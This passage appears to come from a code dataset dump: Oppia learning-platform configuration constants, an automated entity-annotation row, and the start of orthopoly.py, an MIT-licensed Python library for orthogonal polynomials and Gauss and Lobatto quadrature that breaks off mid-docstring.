DEFAULT_LANGUAGE_CODE = 'en'
# The id of the default skin.
# TODO(sll): Deprecate this; it is no longer used.
DEFAULT_SKIN_ID = 'conversation_v1'
# The prefix for an 'accepted suggestion' commit message.
COMMIT_MESSAGE_ACCEPTED_SUGGESTION_PREFIX = 'Accepted suggestion by'
# User id and username for exploration migration bot. Commits made by this bot
# are not reflected in the exploration summary models, but are recorded in the
# exploration commit log.
MIGRATION_BOT_USER_ID = 'OppiaMigrationBot'
MIGRATION_BOT_USERNAME = 'OppiaMigrationBot'
# Ids and locations of the permitted extensions.
ALLOWED_RTE_EXTENSIONS = {
'Collapsible': {
'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Collapsible')
},
'Image': {
'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Image')
},
'Link': {
'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Link')
},
'Math': {
'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Math')
},
'Tabs': {
'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Tabs')
},
'Video': {
'dir': os.path.join(RTE_EXTENSIONS_DIR, 'Video')
},
}
# These categories and interactions are displayed in the order in which they
# appear in the interaction selector.
ALLOWED_INTERACTION_CATEGORIES = [{
'name': 'General',
'interaction_ids': [
'Continue',
'EndExploration',
'ImageClickInput',
'ItemSelectionInput',
'MultipleChoiceInput',
'TextInput'
],
}, {
'name': 'Math',
'interaction_ids': [
'GraphInput',
'LogicProof',
'NumericInput',
'SetInput',
'MathExpressionInput',
]
}, {
'name': 'Programming',
'interaction_ids': [
'CodeRepl',
'PencilCodeEditor',
],
}, {
'name': 'Music',
'interaction_ids': [
'MusicNotesInput'
],
}, {
'name': 'Geography',
'interaction_ids': [
'InteractiveMap'
],
}]
ALLOWED_GADGETS = {
'ScoreBar': {
'dir': os.path.join(GADGETS_DIR, 'ScoreBar')
},
}
# Gadgets subclasses must specify a valid panel option from this list.
ALLOWED_GADGET_PANELS = ['bottom']
# Demo explorations to load through the admin panel. The id assigned to each
# exploration is based on the key of the exploration in this dict, so ensure it
# doesn't change once it's in the list. Only integer-based indices should be
# used in this list, as it maintains backward compatibility with how demo
# explorations used to be assigned IDs. The value of each entry in this dict is
# either a YAML file or a directory (depending on whether it ends in .yaml).
# These explorations can be found under data/explorations.
DEMO_EXPLORATIONS = {
u'0': 'welcome.yaml',
u'1': 'multiples.yaml',
u'2': 'binary_search',
u'3': 'root_linear_coefficient_theorem.yaml',
u'4': 'three_balls',
# TODO(bhenning): Replace demo exploration '5' with a new exploration
# described in #1376.
u'6': 'boot_verbs.yaml',
u'7': 'hola.yaml',
u'8': 'adventure.yaml',
u'9': 'pitch_perfect.yaml',
u'10': 'test_interactions',
u'11': 'modeling_graphs',
u'12': 'protractor_test_1.yaml',
u'13': 'solar_system',
u'14': 'about_oppia.yaml',
u'15': 'classifier_demo_exploration.yaml',
u'16': 'all_interactions',
}
DEMO_COLLECTIONS = {
u'0': 'welcome_to_collections.yaml'
}
# IDs of explorations which should not be displayable in either the learner or
# editor views.
DISABLED_EXPLORATION_IDS = ['5']
# Google Group embed URL for the Forum page.
EMBEDDED_GOOGLE_GROUP_URL = (
'https://groups.google.com/forum/embed/?place=forum/oppia')
# Whether to allow YAML file uploads.
ALLOW_YAML_FILE_UPLOAD = False
# Prefix for all taskqueue-related URLs.
TASKQUEUE_URL_PREFIX = '/task'
TASK_URL_FEEDBACK_MESSAGE_EMAILS = (
'%s/email/batchfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_FEEDBACK_STATUS_EMAILS = (
'%s/email/feedbackthreadstatuschangeemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_FLAG_EXPLORATION_EMAILS = (
'%s/email/flagexplorationemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_INSTANT_FEEDBACK_EMAILS = (
'%s/email/instantfeedbackmessageemailhandler' % TASKQUEUE_URL_PREFIX)
TASK_URL_SUGGESTION_EMAILS = (
'%s/email/suggestionemailhandler' % TASKQUEUE_URL_PREFIX)
# TODO(sll): Add all other URLs here.
ADMIN_URL = '/admin'
COLLECTION_DATA_URL_PREFIX = '/collection_handler/data'
EDITABLE_COLLECTION_DATA_URL_PREFIX = '/collection_editor_handler/data'
COLLECTION_RIGHTS_PREFIX = '/collection_editor_handler/rights'
COLLECTION_EDITOR_URL_PREFIX = '/collection_editor/create'
COLLECTION_URL_PREFIX = '/collection'
DASHBOARD_URL = '/dashboard'
DASHBOARD_CREATE_MODE_URL = '%s?mode=create' % DASHBOARD_URL
DASHBOARD_DATA_URL = '/dashboardhandler/data'
DASHBOARD_EXPLORATION_STATS_PREFIX = '/dashboardhandler/explorationstats'
EDITOR_URL_PREFIX = '/create'
EXPLORATION_DATA_PREFIX = '/createhandler/data'
EXPLORATION_INIT_URL_PREFIX = '/explorehandler/init'
EXPLORATION_METADATA_SEARCH_URL = '/exploration/metadata_search'
EXPLORATION_RIGHTS_PREFIX = '/createhandler/rights'
EXPLORATION_SUMMARIES_DATA_URL = '/explorationsummarieshandler/data'
EXPLORATION_URL_PREFIX = '/explore'
EXPLORATION_URL_EMBED_PREFIX = '/embed/exploration'
FEEDBACK_STATS_URL_PREFIX = '/feedbackstatshandler'
FEEDBACK_THREAD_URL_PREFIX = '/threadhandler'
FEEDBACK_THREADLIST_URL_PREFIX = '/threadlisthandler'
FEEDBACK_THREAD_VIEW_EVENT_URL = '/feedbackhandler/thread_view_event'
FLAG_EXPLORATION_URL_PREFIX = '/flagexplorationhandler'
LIBRARY_GROUP_DATA_URL = '/librarygrouphandler'
LIBRARY_INDEX_URL = '/library'
LIBRARY_INDEX_DATA_URL = '/libraryindexhandler'
LIBRARY_RECENTLY_PUBLISHED_URL = '/library/recently_published'
LIBRARY_SEARCH_URL = '/search/find'
LIBRARY_SEARCH_DATA_URL = '/searchhandler/data'
LIBRARY_TOP_RATED_URL = '/library/top_rated'
NEW_COLLECTION_URL = '/collection_editor_handler/create_new'
NEW_EXPLORATION_URL = '/contributehandler/create_new'
RECENT_COMMITS_DATA_URL = '/recentcommitshandler/recent_commits'
RECENT_FEEDBACK_MESSAGES_DATA_URL = '/recent_feedback_messages'
ROBOTS_TXT_URL = '/robots.txt'
SITE_FEEDBACK_FORM_URL = ''
SITE_LANGUAGE_DATA_URL = '/save_site_language'
SIGNUP_DATA_URL = '/signuphandler/data'
SIGNUP_URL = '/signup'
SPLASH_URL = '/splash'
SUGGESTION_ACTION_URL_PREFIX = '/suggestionactionhandler'
SUGGESTION_LIST_URL_PREFIX = '/suggestionlisthandler'
SUGGESTION_URL_PREFIX = '/suggestionhandler'
UPLOAD_EXPLORATION_URL = '/contributehandler/upload'
USERNAME_CHECK_DATA_URL = '/usernamehandler/data'
NAV_MODE_ABOUT = 'about'
NAV_MODE_BLOG = 'blog'
NAV_MODE_COLLECTION = 'collection'
NAV_MODE_CONTACT = 'contact'
NAV_MODE_CREATE = 'create'
NAV_MODE_DASHBOARD = 'dashboard'
NAV_MODE_DONATE = 'donate'
NAV_MODE_EXPLORE = 'explore'
NAV_MODE_LIBRARY = 'library'
NAV_MODE_PROFILE = 'profile'
NAV_MODE_SIGNUP = 'signup'
NAV_MODE_SPLASH = 'splash'
NAV_MODE_TEACH = 'teach'
NAV_MODE_THANKS = 'thanks'
# Event types.
EVENT_TYPE_STATE_HIT = 'state_hit'
EVENT_TYPE_ANSWER_SUBMITTED = 'answer_submitted'
EVENT_TYPE_DEFAULT_ANSWER_RESOLVED = 'default_answer_resolved'
EVENT_TYPE_NEW_THREAD_CREATED = 'feedback_thread_created'
EVENT_TYPE_THREAD_STATUS_CHANGED = 'feedback_thread_status_changed'
EVENT_TYPE_RATE_EXPLORATION = 'rate_exploration'
# The values for these event types should be left as-is for backwards
# compatibility.
EVENT_TYPE_START_EXPLORATION = 'start'
EVENT_TYPE_MAYBE_LEAVE_EXPLORATION = 'leave'
EVENT_TYPE_COMPLETE_EXPLORATION = 'complete'
ACTIVITY_STATUS_PRIVATE = 'private'
ACTIVITY_STATUS_PUBLIC = 'public'
ACTIVITY_STATUS_PUBLICIZED = 'publicized'
# Play type constants
PLAY_TYPE_PLAYTEST = 'playtest'
PLAY_TYPE_NORMAL = 'normal'
# Predefined commit messages.
COMMIT_MESSAGE_EXPLORATION_DELETED = 'Exploration deleted.'
COMMIT_MESSAGE_COLLECTION_DELETED = 'Collection deleted.'
# Unfinished features.
SHOW_TRAINABLE_UNRESOLVED_ANSWERS = False
# Number of unresolved answers to be displayed in the dashboard for each
# exploration.
TOP_UNRESOLVED_ANSWERS_COUNT_DASHBOARD = 3
# Number of open feedback to be displayed in the dashboard for each exploration.
OPEN_FEEDBACK_COUNT_DASHBOARD = 3
# NOTE TO DEVELOPERS: This should be synchronized with base.js
ENABLE_STRING_CLASSIFIER = False
SHOW_COLLECTION_NAVIGATION_TAB_HISTORY = False
SHOW_COLLECTION_NAVIGATION_TAB_STATS = False
# Output formats of downloaded explorations.
OUTPUT_FORMAT_JSON = 'json'
OUTPUT_FORMAT_ZIP = 'zip'
# Types of updates shown in the 'recent updates' table in the dashboard page.
UPDATE_TYPE_EXPLORATION_COMMIT = 'exploration_commit'
UPDATE_TYPE_COLLECTION_COMMIT = 'collection_commit'
UPDATE_TYPE_FEEDBACK_MESSAGE = 'feedback_thread'
# Possible values for user query status.
# Valid status transitions are: processing --> completed --> archived
# Or processing --> failed.
USER_QUERY_STATUS_PROCESSING = 'processing'
USER_QUERY_STATUS_COMPLETED = 'completed'
USER_QUERY_STATUS_ARCHIVED = 'archived'
USER_QUERY_STATUS_FAILED = 'failed'
# The time difference between which to consider two login events "close". This
# is taken to be 12 hours.
PROXIMAL_TIMEDELTA_SECS = 12 * 60 * 60
DEFAULT_COLOR = '#a33f40'
DEFAULT_THUMBNAIL_ICON = 'Lightbulb'
# List of supported default categories. For now, each category has a specific
# color associated with it. Each category also has a thumbnail icon whose
# filename is "{{CategoryName}}.svg".
CATEGORIES_TO_COLORS = {
'Mathematics': '#cd672b',
'Algebra': '#cd672b',
'Arithmetic': '#d68453',
'Calculus': '#b86330',
'Logic': '#d68453',
'Combinatorics': '#cf5935',
'Graph Theory': '#cf5935',
'Probability': '#cf5935',
'Statistics': '#cd672b',
'Geometry': '#d46949',
'Trigonometry': '#d46949',
'Algorithms': '#d0982a',
'Computing': '#bb8b2f',
'Programming': '#d9aa53',
'Astronomy': '#879d6c',
'Biology': '#97a766',
'Chemistry': '#aab883',
'Engineering': '#8b9862',
'Environment': '#aba86d',
'Medicine': '#97a766',
'Physics': '#879d6c',
'Architecture': '#6e3466',
'Art': '#895a83',
'Music': '#6a3862',
'Philosophy': '#613968',
'Poetry': '#7f507f',
'English': '#193a69',
'Languages': '#1b4174',
'Latin': '#3d5a89',
'Reading': '#193a69',
'Spanish': '#405185',
'Gaulish': '#1b4174',
'Business': '#387163',
'Economics': '#5d8b7f',
'Geography': '#3c6d62',
'Government': '#538270',
'History': '#3d6b52',
'Law': '#538270',
'Education': '#942e20',
'Puzzles': '#a8554a',
'Sport': '#893327',
'Welcome': '#992a2b',
}
# Types of activities that can be created with Oppia.
ACTIVITY_TYPE_EXPLORATION = 'exploration'
ACTIVITY_TYPE_COLLECTION = 'collection'
ALL_ACTIVITY_TYPES = [ACTIVITY_TYPE_EXPLORATION, ACTIVITY_TYPE_COLLECTION]
# A sorted list of default categories for which icons and background colours
# exist.
ALL_CATEGORIES = sorted(CATEGORIES_TO_COLORS.keys())
# These categories are shown in the library navbar.
SEARCH_DROPDOWN_CATEGORIES = sorted([
'Mathematics',
'Statistics',
'Algorithms',
'Programming',
'Biology',
'Chemistry',
'Physics',
'Medicine',
'English',
'Architecture',
'Art',
'Music',
'Reading',
'Business',
'Economics',
'Geography',
'History',
])
# The i18n id for the header of the "Featured Activities" category in the
# library index page.
LIBRARY_CATEGORY_FEATURED_ACTIVITIES = 'I18N_LIBRARY_GROUPS_FEATURED_ACTIVITIES'
# The i18n id for the header of the "Top Rated Explorations" category in the
# library index page.
LIBRARY_CATEGORY_TOP_RATED_EXPLORATIONS = (
'I18N_LIBRARY_GROUPS_TOP_RATED_EXPLORATIONS')
# The i18n id for the header of the "Recently Published" category in the
# library index page.
LIBRARY_CATEGORY_RECENTLY_PUBLISHED = 'I18N_LIBRARY_GROUPS_RECENTLY_PUBLISHED'
# The group name that appears at the end of the url for the recently published
# page.
LIBRARY_GROUP_RECENTLY_PUBLISHED = 'recently_published'
# The group name that appears at the end of the url for the top rated page.
LIBRARY_GROUP_TOP_RATED = 'top_rated'
# NOTE TO DEVELOPERS: The LIBRARY_PAGE_MODE constants defined below should have
# the same value as the ones defined in LIBRARY_PAGE_MODES in Library.js. For
# example LIBRARY_PAGE_MODE_GROUP should have the same value as
# LIBRARY_PAGE_MODES.GROUP.
# Page mode for the group pages such as top rated and recently published
# explorations.
LIBRARY_PAGE_MODE_GROUP = 'group'
# Page mode for the main library page.
LIBRARY_PAGE_MODE_INDEX = 'index'
# Page mode for the search results page.
LIBRARY_PAGE_MODE_SEARCH = 'search'
# List of supported language codes. Each description has a
# parenthetical part that may be stripped out to give a shorter
# description.
ALL_LANGUAGE_CODES = [{
'code': 'en', 'description': u'English',
}, {
'code': 'ar', 'description': u'العربية (Arabic)',
}, {
'code': 'bg', 'description': u'български (Bulgarian)',
}, {
'code': 'ca', 'description': u'català (Catalan)',
}, {
'code': 'zh', 'description': u'中文 (Chinese)',
}, {
'code': 'hr', 'description': u'hrvatski (Croatian)',
}, {
'code': 'cs', 'description': u'čeština (Czech)',
}, {
'code': 'da', 'description': u'dansk (Danish)',
}, {
'code': 'nl', 'description': u'Nederlands (Dutch)',
}, {
'code': 'tl', 'description': u'Filipino (Filipino)',
}, {
'code': 'fi', 'description': u'suomi (Finnish)',
}, {
'code': 'fr', 'description': u'français (French)',
}, {
'code': 'de', 'description': u'Deutsch (German)',
}, {
'code': 'el', 'description': u'ελληνικά (Greek)',
}, {
'code': 'he', 'description': u'עברית (Hebrew)',
}, {
'code': 'hi', 'description': u'हिन्दी (Hindi)',
}, {
'code': 'hu', 'description': u'magyar (Hungarian)',
}, {
'code': 'id', 'description': u'Bahasa Indonesia (Indonesian)',
}, {
'code': 'it', 'description': u'italiano (Italian)',
}, {
'code': 'ja', 'description': u'日本語 (Japanese)',
}, {
'code': 'ko', 'description': u'한국어 (Korean)',
}, {
'code': 'lv', 'description': u'latviešu (Latvian)',
}, {
'code': 'lt', 'description': u'lietuvių (Lithuanian)',
}, {
'code': 'no', 'description': u'Norsk (Norwegian)',
}, {
'code': 'fa', 'description': u'فارسی (Persian)',
}, {
'code': 'pl', 'description': u'polski (Polish)',
}, {
'code': 'pt', 'description': u'português (Portuguese)',
}, {
'code': 'ro', 'description': u'română (Romanian)',
}, {
'code': 'ru', 'description': u'русский (Russian)',
}, {
'code': 'sr', 'description': u'српски (Serbian)',
}, {
'code': 'sk', 'description': u'slovenčina (Slovak)',
}, {
'code': 'sl', 'description': u'slovenščina (Slovenian)',
}, {
'code': 'es', 'description': u'español (Spanish)',
}, {
'code': 'sv', 'description': u'svenska (Swedish)',
}, {
'code': 'th', 'description': u'ภาษาไทย (Thai)',
}, {
'code': 'tr', 'description': u'Türkçe (Turkish)',
}, {
'code': 'uk', 'description': u'українська (Ukrainian)',
}, {
'code': 'vi', 'description': u'Tiếng Việt (Vietnamese)',
}]
# Defaults for topic similarities
DEFAULT_TOPIC_SIMILARITY = 0.5
SAME_TOPIC_SIMILARITY = 1.0
# NOTE TO DEVELOPERS: While adding another language, please ensure that the
# languages are in alphabetical order.
SUPPORTED_SITE_LANGUAGES = [{
'id': 'id',
'text': 'Bahasa Indonesia'
}, {
'id': 'en',
'text': 'English'
}, {
'id': 'es',
'text': 'Español'
}, {
'id': 'pt',
'text': 'Português'
}, {
'id': 'pt-br',
'text': 'Português (Brasil)'
}, {
'id': 'vi',
'text': 'Tiếng Việt'
}, {
'id': 'hi',
'text': 'हिन्दी'
}]
SYSTEM_USERNAMES = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]
SYSTEM_USER_IDS = [SYSTEM_COMMITTER_ID, MIGRATION_BOT_USERNAME]
# The following are all page descriptions for the meta tag.
ABOUT_PAGE_DESCRIPTION = (
'Oppia is an open source learning platform that connects a community of '
'teachers and learners. You can use this site to create 1-1 learning '
'scenarios for others.')
BLOG_PAGE_DESCRIPTION = (
'Keep up to date with Oppia news and updates via our blog.')
CONTACT_PAGE_DESCRIPTION = (
'Contact the Oppia team, submit feedback, and learn how to get involved '
'with the Oppia project.')
CREATE_PAGE_DESCRIPTION = (
'Help others learn new things. Create lessons through explorations and '
'share your knowledge with the community.')
DASHBOARD_PAGE_DESCRIPTION = (
'Keep track of the lessons you have created, as well as feedback from '
'learners.')
DONATE_PAGE_DESCRIPTION = (
'Donate to The Oppia Foundation.')
FORUM_PAGE_DESCRIPTION = (
'Engage with the Oppia community by discussing questions, bugs and '
'explorations in the forum.')
LIBRARY_GROUP_PAGE_DESCRIPTION = (
'Discover top-rated or recently-published explorations on Oppia. Learn '
'from these explorations or help improve an existing one for the '
'community.')
LIBRARY_PAGE_DESCRIPTION = (
'Looking to learn something new? Find explorations created by professors, '
'teachers and Oppia users in a subject you\'re interested in, and start '
'exploring!')
PREFERENCES_PAGE_DESCRIPTION = (
'Change your Oppia profile settings and preferences')
SEARCH_PAGE_DESCRIPTION = (
'Discover a new exploration to learn from, or help improve an existing '
'one for the community.')
SIGNUP_PAGE_DESCRIPTION = (
'Sign up for Oppia and begin exploring a new subject.')
SPLASH_PAGE_DESCRIPTION = (
'Oppia is a free site for sharing knowledge via interactive lessons '
'called \'explorations\'. Learn from user-created explorations, or teach '
'and create your own.')
TEACH_PAGE_DESCRIPTION = (
'The Oppia library is full of user-created lessons called \'explorations\'.'
' Read about how to participate in the community and begin creating '
'explorations.')
TERMS_PAGE_DESCRIPTION = (
'Oppia is a 501(c)(3) registered non-profit open-source e-learning '
'platform. Learn about our terms and conditions for creating and '
'distributing learning material.')
THANKS_PAGE_DESCRIPTION = (
'Thank you for donating to The Oppia Foundation.')
SITE_NAME = 'Oppia.org'
# The type of the response returned by a handler when an exception is raised.
HANDLER_TYPE_HTML = 'html'
HANDLER_TYPE_JSON = 'json'
| 30,534 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', "https://groups.google.com/forum/embed/?place=forum/oppia'"], ['DATE_TIME', '2014'], ['PERSON', 'IS_MINIFIED'], ['PERSON', 'NUMBER_OF_TOP_RATED_EXPLORATIONS_FOR_LIBRARY_PAGE'], ['PERSON', 'ACCEPTED_IMAGE_FORMATS_AND_EXTENSIONS'], ['PERSON', "r'^[A-Za-z0-9]+$"], ['PERSON', "-Za-z]+)*$'"], ['PERSON', 'TODO'], ['PERSON', 'Committer'], ['PERSON', 'email_manager.py'], ['PERSON', 'DEFAULT_FEEDBACK_MESSAGE_EMAIL_PREFERENCE = True'], ['DATE_TIME', 'minutes'], ['PERSON', 'EMAIL_INTENT_EDITOR_ROLE_NOTIFICATION'], ['PERSON', "EMAIL_INTENT_FEEDBACK_MESSAGE_NOTIFICATION = '"], ['PERSON', 'VALID_MODERATOR_ACTIONS'], ['PERSON', 'GADGET_PANEL_AXIS_HORIZONTAL'], ['DATE_TIME', '10'], ['DATE_TIME', '14'], ['DATE_TIME', '40'], ['LOCATION', 'UserStatsModel'], ['DATE_TIME', "OppiaMigrationBot'"], ['URL', 'os.path.jo'], ['LOCATION', 'ALLOWED_INTERACTION_CATEGORIES'], ['PERSON', 'MultipleChoiceInput'], ['PERSON', 'SetInput'], ['PERSON', 'EDITOR_URL_PREFIX'], ['NRP', 'EXPLORATION_METADATA_SEARCH_URL'], ['PERSON', 'SUGGESTION_URL_PREFIX'], ['PERSON', 'NAV_MODE_COLLECTION'], ['LOCATION', 'NAV_MODE_LIBRARY'], ['PERSON', 'EVENT_TYPE_DEFAULT_ANSWER_RESOLVED'], ['PERSON', "EVENT_TYPE_THREAD_STATUS_CHANGED = '"], ['PERSON', 'EVENT_TYPE_MAYBE_LEAVE_EXPLORATION'], ['PERSON', 'USER_QUERY_STATUS_ARCHIVED'], ['DATE_TIME', '12 hours'], ['PERSON', 'Lightbulb'], ['DATE_TIME', "8b9862'"], ['DATE_TIME', "405185'"], ['PERSON', "u'български"], ['NRP', 'Bulgarian'], ['NRP', 'Chinese'], ['NRP', 'Croatian'], ['NRP', 'Czech'], ['NRP', 'Danish'], ['NRP', 'Dutch'], ['PERSON', "u'Filipino"], ['NRP', 'Finnish'], ['NRP', 'French'], ['NRP', 'German'], ['NRP', 'Greek'], ['PERSON', "u'magyar"], ['NRP', 'Hungarian'], ['LOCATION', 'Indonesia'], ['NRP', 'Indonesian'], ['NRP', 'Italian'], ['NRP', 'Japanese'], ['PERSON', 'ko'], ['NRP', 'Korean'], ['NRP', 'Latvian'], ['NRP', 'Lithuanian'], ['NRP', 'Norwegian'], ['NRP', 'Persian'], ['NRP', 'Polish'], ['NRP', 'Portuguese'], ['PERSON', "u'română"], ['NRP', 'Romanian'], ['NRP', 'Russian'], ['NRP', 'Serbian'], ['PERSON', "u'slovenčina"], ['NRP', 'Slovak'], ['NRP', 'Slovenian'], ['NRP', 'Spanish'], ['DATE_TIME', "u'svenska"], ['NRP', 'Swedish'], ['NRP', 'Thai'], ['NRP', 'Turkish'], ['NRP', 'Ukrainian'], ['NRP', 'Vietnamese'], ['LOCATION', 'Indonesia'], ['PERSON', 'Tiếng'], ['PERSON', 'TEACH_PAGE_DESCRIPTION'], ['PERSON', 'THANKS_PAGE_DESCRIPTION'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'os.environ.ge'], ['URL', 'os.environ.ge'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.ge'], ['URL', 'services.py'], ['URL', 'copy.de'], ['URL', 'mailgun.org'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'manager.py'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'os.path.jo'], ['URL', 'COLORS.ke'], ['URL', 'MODES.GR'], ['URL', 'Oppia.org']] |
5 | """
orthopoly.py - A suite of functions for generating orthogonal polynomials
and quadrature rules.
Copyright (c) 2014 Greg von Winckel
All rights reserved.
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be
included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
Last updated on Wed Jan 1 14:29:25 MST 2014
Modified by David A. Ham (dummy@email.com), 2016
"""
import numpy as np
from functools import reduce
from math import gamma
def gauss(alpha, beta):
"""
Compute the Gauss nodes and weights from the recursion
coefficients associated with a set of orthogonal polynomials
Inputs:
alpha - recursion coefficients
beta - recursion coefficients
Outputs:
x - quadrature nodes
w - quadrature weights
Adapted from the MATLAB code by Walter Gautschi
http://www.cs.purdue.edu/archives/2002/wxg/codes/gauss.m
"""
from numpy.linalg import eigh
A = np.diag(np.sqrt(beta)[1:], 1) + np.diag(alpha)
x, V = eigh(A, "U")
w = beta[0] * np.real(np.power(V[0, :], 2))
return x, w
def lobatto(alpha, beta, xl1, xl2):
"""
Compute the Lobatto nodes and weights with the preassigned
nodea xl1,xl2
Inputs:
alpha - recursion coefficients
beta - recursion coefficients
xl1 - assigned node location
xl2 - assigned node location
Outputs:
x - quadrature nodes
w - quadrature weights
Based on the section 7 of the paper
"Some modified matrix eigenvalue problems"
by Gene Golub, SIAM Review Vol 15, No. 2, April 1973, pp.318--334
"""
from numpy.linalg import solve
n = len(alpha) - 1
en = np.zeros(n)
en[-1] = 1
A1 = np.vstack((np.sqrt(beta), alpha - xl1))
J1 = np.diag(A1[0, 1:-1], 1) + np.diag(A1[1, 1:]) + np.diag(A1[0, 1:-1], -1)
A2 = np.vstack((np.sqrt(beta), alpha - xl2))
J2 = np.diag(A2[0, 1:-1], 1) + np.diag(A2[1, 1:]) + np.diag(A2[0, 1:-1], -1)
g1 = solve(J1, en)
g2 = solve(J2, en)
C = np.array(((1, -g1[-1]), (1, -g2[-1])))
xl = np.array((xl1, xl2))
ab = solve(C, xl)
alphal = alpha
alphal[-1] = ab[0]
betal = beta
betal[-1] = ab[1]
x, w = gauss(alphal, betal)
return x, w
def rec_jacobi(N, a, b):
"""
Generate the recursion coefficients alpha_k, beta_k
P_{k+1}(x) = (x-alpha_k)*P_{k}(x) - beta_k P_{k-1}(x)
for the Jacobi polynomials which are orthogonal on [-1,1]
with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b]
Inputs:
N - polynomial order
a - weight parameter
b - weight parameter
Outputs:
alpha - recursion coefficients
beta - recursion coefficients
Adapted from the MATLAB code by Dirk Laurie and Walter Gautschi
http://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi.m
"""
nu = (b - a) / float(a + b + 2)
mu = 2 ** (a + b + 1) * gamma(a + 1) * gamma(b + 1) / gamma(a + b + 2)
if N == 1:
alpha = nu
beta = mu
else:
n = np.arange(1.0, N)
nab = 2 * n + a + b
alpha = np.hstack((nu, (b ** 2 - a ** 2) / (nab * (nab + 2))))
n = n[1:]
nab = nab[1:]
B1 = 4 * (a + 1) * (b + 1) / float((a + b + 2) ** 2 * (a + b + 3))
B = 4 * (n + a) * (n + b) * n * (n + a + b) / \
(nab ** 2 * (nab + 1) * (nab - 1))
beta = np.hstack((mu, B1, B))
return alpha, beta
def rec_jacobi01(N, a, b):
"""
Generate the recursion coefficients alpha_k, beta_k
for the Jacobi polynomials which are orthogonal on [0,1]
See rec_jacobi for the recursion coefficients on [-1,1]
Inputs:
N - polynomial order
a - weight parameter
b - weight parameter
Outputs:
alpha - recursion coefficients
beta - recursion coefficients
Adapted from the MATLAB implementation:
https://www.cs.purdue.edu/archives/2002/wxg/codes/r_jacobi01.m
"""
if a <= -1 or b <= -1:
raise ValueError('''Jacobi coefficients are defined only
for alpha,beta > -1''')
if not isinstance(N, int):
raise TypeError('N must be an integer')
if N < 1:
raise ValueError('N must be at least 1')
c, d = rec_jacobi(N, a, b)
alpha = (1 + c) / 2
beta = d / 4
beta[0] = d[0] / 2 ** (a + b + 1)
return alpha, beta
def polyval(alpha, beta, x):
"""
Evaluate polynomials on x given the recursion coefficients alpha and beta
"""
N = len(alpha)
m = len(x)
P = np.zeros((m, N + 1))
P[:, 0] = 1
P[:, 1] = (x - alpha[0]) * P[:, 0]
for k in range(1, N):
P[:, k + 1] = (x - alpha[k]) * P[:, k] - beta[k] * P[:, k - 1]
return P
def jacobi(N, a, b, x, NOPT=1):
"""
JACOBI computes the Jacobi polynomials which are orthogonal on [-1,1]
with respect to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them
on the given grid up to P_N(x). Setting NOPT=2 returns the
L2-normalized polynomials
"""
m = len(x)
P = np.zeros((m, N + 1))
apb = a + b
a1 = a - 1
b1 = b - 1
c = apb * (a - b)
P[:, 0] = 1
if N > 0:
P[:, 1] = 0.5 * (a - b + (apb + 2) * x)
if N > 1:
for k in range(2, N + 1):
k2 = 2 * k
g = k2 + apb
g1 = g - 1
g2 = g - 2
d = 2.0 * (k + a1) * (k + b1) * g
P[:, k] = (g1 * (c + g2 * g * x) * P[:, k - 1] -
d * P[:, k - 2]) / (k2 * (k + apb) * g2)
if NOPT == 2:
k = np.arange(N + 1)
pnorm = 2 ** (apb + 1) * gamma(k + a + 1) * gamma(k + b + 1) / \
((2 * k + a + b + 1) * (gamma(k + 1) * gamma(k + a + b + 1)))
P *= 1 / np.sqrt(pnorm)
return P
def jacobiD(N, a, b, x, NOPT=1):
"""
JACOBID computes the first derivatives of the normalized Jacobi
polynomials which are orthogonal on [-1,1] with respect
to the weight w(x)=[(1-x)^a]*[(1+x)^b] and evaluate them
on the given grid up to P_N(x). Setting NOPT=2 returns
the derivatives of the L2-normalized polynomials
"""
z = np.zeros((len(x), 1))
if N == 0:
Px = z
else:
Px = 0.5 * np.hstack((z, jacobi(N - 1, a + 1, b + 1, x, NOPT) *
((a + b + 2 + np.arange(N)))))
return Px
def mm_log(N, a):
"""
MM_LOG Modified moments for a logarithmic weight function.
The call mm=MM_LOG(n,a) computes the first n modified moments of the
logarithmic weight function w(t)=t^a log(1/t) on [0,1] relative to
shifted Legendre polynomials.
REFERENCE: Walter Gautschi,``On the preceding paper `A Legendre
polynomial integral' by James L. Blue'',
Math. Comp. 33 (1979), 742-743.
Adapted from the MATLAB implementation:
